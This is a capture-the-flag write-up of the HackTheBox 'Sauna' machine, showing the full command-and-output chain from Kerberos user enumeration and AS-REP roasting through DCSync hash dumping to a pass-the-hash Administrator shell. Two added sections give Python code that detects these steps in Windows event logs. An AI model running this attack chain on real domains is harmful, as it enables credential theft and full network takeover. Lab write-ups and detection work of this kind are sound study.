Sunday, 22 March 2020

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All the fun is in enumeration. Start by enumerating employee accounts; the website turns out to be useful.

 root@kali  /opt/kerbrute/dist   master v1.0.3  ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80  --safe -v -t 148 /tmp/logins


2020/03/19 20:27:25 >  [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 >  [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist



  root@kali  /opt/dirsearch   master ?  smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'                                               
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
print$          Disk      Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
       

Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)

python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2  -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
 root@kali  /opt/impacket/examples   master  cat /tmp/responses.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$[remainder of hash truncated]
 root@kali  /opt/impacket/examples   master                      
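Added example, not part of the original write-up: detection logic for the two Kerberos steps above (the kerbrute user enumeration and the AS-REP request that GetNPUsers makes), run over constructed Event ID 4768 records. The JSON field names, the client IP 10.10.14.5 and the timings are assumptions made for the sample; a real SIEM export would need its own field mapping.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4768 (Kerberos TGT requested) records, one JSON
# object per line; not real DC logs. Failed requests carry result 0x6
# (KDC_ERR_C_PRINCIPAL_UNKNOWN, "user does not exist") and, as on a real DC,
# no meaningful pre-authentication type or ticket encryption type.
SAMPLE_4768 = """
{"time": "2020-03-19T20:27:25", "id": 4768, "user": "steven.kerb", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"}
{"time": "2020-03-19T20:27:26", "id": 4768, "user": "scoins", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"}
{"time": "2020-03-19T20:27:26", "id": 4768, "user": "fsmith", "ip": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"}
{"time": "2020-03-19T20:27:26", "id": 4768, "user": "sdriver", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"}
{"time": "2020-03-19T20:27:26", "id": 4768, "user": "btaylor", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"}
{"time": "2020-03-19T20:30:00", "id": 4768, "user": "hsmith", "ip": "10.10.10.20", "status": "0x0", "preauth": "2", "etype": "0x12"}
{"time": "2020-03-19T21:10:00", "id": 4768, "user": "jdoe", "ip": "10.10.10.21", "status": "0x6", "preauth": "-", "etype": "0xffffffff"}
"""


def parse_events(text):
    """Parse JSON-lines event records into dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_user_enumeration(events, threshold=3, window=timedelta(minutes=1)):
    """Return {client_ip: burst_size} for IPs that produced >= threshold 4768
    failures with result 0x6 inside one time window. That burst is what
    kerbrute userenum leaves behind; one mistyped username does not."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4768 and e["status"].lower() == "0x6":
            failures[e["ip"]].append(datetime.fromisoformat(e["time"]))
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        for i, start in enumerate(times):
            # count failures inside the window that opens at this failure
            burst = sum(1 for t in times[i:] if t - start <= window)
            if burst >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), burst)
    return flagged


def detect_asrep_roast(events):
    """Return accounts whose TGT was issued with pre-authentication type 0
    (no pre-auth required) and RC4 (0x17) encryption: the standard AS-REP
    roasting signature, since that reply is crackable offline as shown above."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["status"].lower() == "0x0"
                   and e["preauth"] == "0" and e["etype"].lower() == "0x17"})
```

The mitigation side is the same field: clearing "Do not require Kerberos preauthentication" on the flagged account removes the finding, and the 0x6 burst rule is worth tuning to the window size your own clients produce.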

 root@kali  /opt/impacket/examples   master  python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
 root@kali  /opt/impacket/examples   master    


 root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir


    Directory: C:\Users\FSmith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/20/2020   1:07 PM                PowerSploit-master
-a----        3/20/2020   1:18 PM          53760 SauronEye.exe
-a----        3/20/2020  12:58 PM           7120 WindowsEnum.ps1


  Windows Enumeration Script v 0.1
          by absolomb
       www.sploitspren.com
------------------------------------------


*Evil-WinRM* PS C:\Users\FSmith\Documents>

  User Directories
------------------------------------------

Name
----
Administrator
FSmith
Public
svc_loanmgr
  User Autologon Registry Items
------------------------------------------

DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ---------------                 ---------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!


 root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>


*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt




*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe



root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed

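Added example, not part of the original write-up: detection of the DCSync replication that secretsdump's DRSUAPI path above depends on, run over constructed Event ID 4662 records. The replication-right GUIDs are the well-known AD extended-rights GUIDs; the JSON field names, the object class given by name and the unrelated GUID in the third record are assumptions made for the sample.

```python
import json
import re

# Control access rights on the domain object that DRSUAPI replication needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample of Event ID 4662 (operation performed on an object) records;
# not real DC logs. A real 4662 lists the access-right GUIDs in its Properties
# field, reproduced here as a string. The last record's GUID is a made-up
# non-replication right used to show that ordinary object access is ignored.
SAMPLE_4662 = """
{"time": "2020-03-19T11:58:00", "id": 4662, "subject": "SAUNA$", "object_type": "domainDNS", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"time": "2020-03-19T12:00:05", "id": 4662, "subject": "svc_loanmgr", "object_type": "domainDNS", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"time": "2020-03-19T12:00:09", "id": 4662, "subject": "svc_loanmgr", "object_type": "user", "properties": "{deadbeef-0000-4000-8000-000000000001}"}
"""


def parse_events(text):
    """Parse JSON-lines event records into dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def replication_rights_used(event):
    """Names of replication rights referenced in one event's Properties field."""
    guids = (g.lower() for g in GUID_RE.findall(event.get("properties", "")))
    return sorted({REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS})


def detect_dcsync(events, domain_controllers):
    """Return [(subject, rights)] for replication requests against the domain
    object made by anything other than a domain controller computer account.
    DCs replicate with each other; a user or service account doing it is the
    DCSync pattern, which is why svc_loanmgr could dump NTDS.DIT above."""
    dcs = {dc.upper() for dc in domain_controllers}
    hits = []
    for e in events:
        if e.get("id") != 4662 or e.get("object_type") != "domainDNS":
            continue
        rights = replication_rights_used(e)
        if rights and e["subject"].upper() not in dcs:
            hits.append((e["subject"], rights))
    return hits
```

The preventive check is the ACL itself: any non-DC principal holding these three rights on the domain naming context is a DCSync-capable account and should be reviewed.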

 root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
